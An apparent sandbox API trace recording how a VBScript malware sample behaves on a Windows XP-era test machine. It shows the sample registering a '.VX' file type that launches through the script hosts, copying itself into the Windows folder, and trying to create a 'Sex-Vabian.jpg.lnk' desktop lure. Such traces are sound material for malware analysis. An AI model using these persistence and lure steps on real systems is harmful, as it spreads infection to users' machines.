Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => PE\x00\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => L\x01\x04\x000\xa1\x02H\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x02! FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => \x08\x01\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => .text\x00\x00\x00\xc22\x01\x00\x00\x10\x00\x00\x00@\x01\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00` FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => .data\x00\x00\x00\xc0
\x00\x00\x00P\x01\x00\x00\x10\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xc0 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => .rsrc\x00\x00\x00`\x81\x00\x00\x00`\x01\x00\x00\x90\x00\x00\x00`\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00@ FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => `\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x02\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => `\x05\x00\x800\x00\x00\x80 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => \x18`\x01\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x03\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => P\x05\x00\x80H\x00\x00\x80 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => `\x01\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x07\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => T\x00Y\x00P\x00E\x00L\x00I\x00B\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => `\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => X`\x01\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x01\x00\x00\x00X\x01\x00\x80 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => `\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x04\x00\x00\xc0\x03\x00\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x10i\x01\x00Ti\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => \x00\x10\x02\x00\x00\x00\x00\x00\x00\x10\x02\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x000001dc FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e42c SectionHandle => 0x000001dc ProcessHandle => 0xffffffff BaseAddress => 0x00f80000 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ce |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001ca Access => 2 Registry => 0x80000000 Class => SubKey => VXFile\DefaultIcon |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001ca Buffer => C:\PROGRA~1\INTERN~1\iexplore.exe,8\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001ba Access => 2 Registry => 0x80000000 Class => SubKey => VXFile\ScriptEngine |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001ba Buffer => VBScript\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001ca Access => 2 Registry => 0x80000000 Class => SubKey => VXFile\ScriptHostEncode |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001ca Buffer => {85131631-480C-11D2-B1F9-00C04F86C324}\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001c6 Access => 2 Registry => 0x80000000 Class => SubKey => VXFile\Shell\Open\Command |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001c6 Buffer => C:\WINDOWS\WScript.exe "%1" %*\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001ba Access => 2 Registry => 0x80000000 Class => SubKey => VXFile\Shell\Play\Command |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001ba Buffer => C:\WINDOWS\COMMAND\CScript.exe "%1" %*\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001ca Access => 2 Registry => 0x80000000 Class => SubKey => VXFile\ShellEx\PropertySheetHandlers\WSHProps |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001ca Buffer => {60254CA5-953B-11CF-8C96-00AA00B8708C}\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001ba Access => 2 Registry => 0x80000000 Class => SubKey => .VX |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001ba Buffer => VXFile\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001c6 Access => 2 Registry => 0x80000000 Class => SubKey => VX\CLSID |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001c6 Buffer => {B54F3741-5B07-11cf-A4B0-00AA004A55E8}\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs |
SUCCESS | 0x001ace08 | |
| 19:40:26,433 | 252 | CopyFileW |
ExistingFileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs NewFileName => C:\windows\backup_vabian.sys |
SUCCESS | 0x00000001 | |
| 19:40:26,433 | 252 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c4 FileInformation => |
FAILURE | 0x80000006 | |
| 19:40:26,433 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs |
SUCCESS | 0x001ace08 | |
| 19:40:26,433 | 252 | CopyFileW |
ExistingFileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs NewFileName => C:\windows\Vabian.VX |
SUCCESS | 0x00000001 | |
| 19:40:26,433 | 252 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c4 FileInformation => |
FAILURE | 0x80000006 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c4 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001c4 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c4 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x80000000 SubKey => wscript.shell |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ba Registry => 0x000001c6 SubKey => CLSID |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001ba Data => {\x007\x002\x00C\x002\x004\x00D\x00D\x005\x00-\x00D\x007\x000\x00A\x00-\x004\x003\x008\x00B\x00-\x008\x00A\x004\x002\x00-\x009\x008\x004\x002\x004\x00B\x008\x008\x00A\x00F\x00B\x008\x00}\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 1 FunctionName => FunctionAddress => 0x01001905 ModuleHandle => 0x01000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c4 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001c4 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c4 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c4 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001c4 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c4 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x000000f2 SubKey => CLSID\{00021401-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ba Registry => 0x000000f2 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x000001ba SubKey => CLSID\{00021401-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ca Registry => 0x000001c6 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001ca DataLength => 1000 ValueName => InprocServer32 Type => 1581080 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => InprocServerX86 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => LocalServer32 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ca Registry => 0x000001c6 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001ca Data => s\x00h\x00e\x00l\x00l\x003\x002\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => InprocHandler32 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => InprocHandlerX86 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => LocalServer32 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => LocalServer |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ca Registry => 0x000001ba SubKey => CLSID\{00021401-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001ca DataLength => 100 ValueName => AppID Type => 1304768 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x000001ba SubKey => CLSID\{00021401-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ca Registry => 0x000001c6 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001ca Data => A\x00p\x00a\x00r\x00t\x00m\x00e\x00n\x00t\x00\x00\x00 ValueName => ThreadingModel |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x80000000 SubKey => CLSID\{00021401-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrLoadDll |
Flags => 1301544 BaseAddress => 0x7c9c0000 FileName => shell32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllGetClassObject FunctionAddress => 0x7c9f28b9 ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllCanUnloadNow FunctionAddress => 0x7ca2388d ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 236 FunctionName => FunctionAddress => 0x773e1798 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | NtCreateFile |
ShareAccess => 5 FileName => C:\Documents and Settings\All Users\Desktop\Sex-Vabian.jpg.lnk DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000000 |
FAILURE | 0xc0000034 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x000001ca Registry => 0x80000000 SubKey => TypeLib |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ce Registry => 0x000001ca SubKey => {F935DC20-1CF0-11D0-ADB9-00C04FD58A0B} |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x000001e2 Registry => 0x000001ce SubKey => 1.0 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x000001e2 SubKey => 409 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x000001e2 SubKey => 9 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x000001e6 Registry => 0x000001e2 SubKey => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ea Registry => 0x000001e6 SubKey => win32 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ea |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001e6 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001e6 Registry => 0x000001e2 SubKey => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ea Registry => 0x000001e6 SubKey => win32 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001ea Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00o\x00m\x00.\x00o\x00c\x00x\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001e6 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001e2 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ce |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001cc DataLength => 4 ValueName => NoNetHood Type => 1301968 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001cc |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001cc DataLength => 4 ValueName => NoPropertiesMyComputer Type => 1301968 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001cc |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001cc DataLength => 4 ValueName => NoInternetIcon Type => 1301968 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001cc |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\wscript.exe |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | LdrGetDllHandle |
ModuleHandle => 0x774e0000 FileName => OLE32.DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrLoadDll |
Flags => 1301128 BaseAddress => 0x774e0000 FileName => ole32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoGetMalloc FunctionAddress => 0x774fdd08 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001cc DataLength => 4 ValueName => NoCommonGroups Type => 1301968 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001cc |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CreateBindCtx FunctionAddress => 0x774fe54c ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D} |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001cc DataLength => 4 ValueName => NoControlPanel Type => 1300320 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001cc |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001cc DataLength => 4 ValueName => NoSetFolders Type => 1300320 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001cc |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExA |
Handle => 0x000001ce Registry => 0x80000000 SubKey => CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001ce Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00S\x00H\x00E\x00L\x00L\x003\x002\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrLoadDll |
Flags => 1300900 BaseAddress => 0x7c9c0000 FileName => C:\WINDOWS\system32\SHELL32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ce |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 328 FunctionName => FunctionAddress => 0x773e1559 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrLoadDll |
Flags => 1301692 BaseAddress => 0x77920000 FileName => SETUPAPI.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CM_Get_Device_Interface_List_Size_ExW FunctionAddress => 0x77929025 ModuleHandle => 0x77920000 |
SUCCESS | 0x00000000 | |
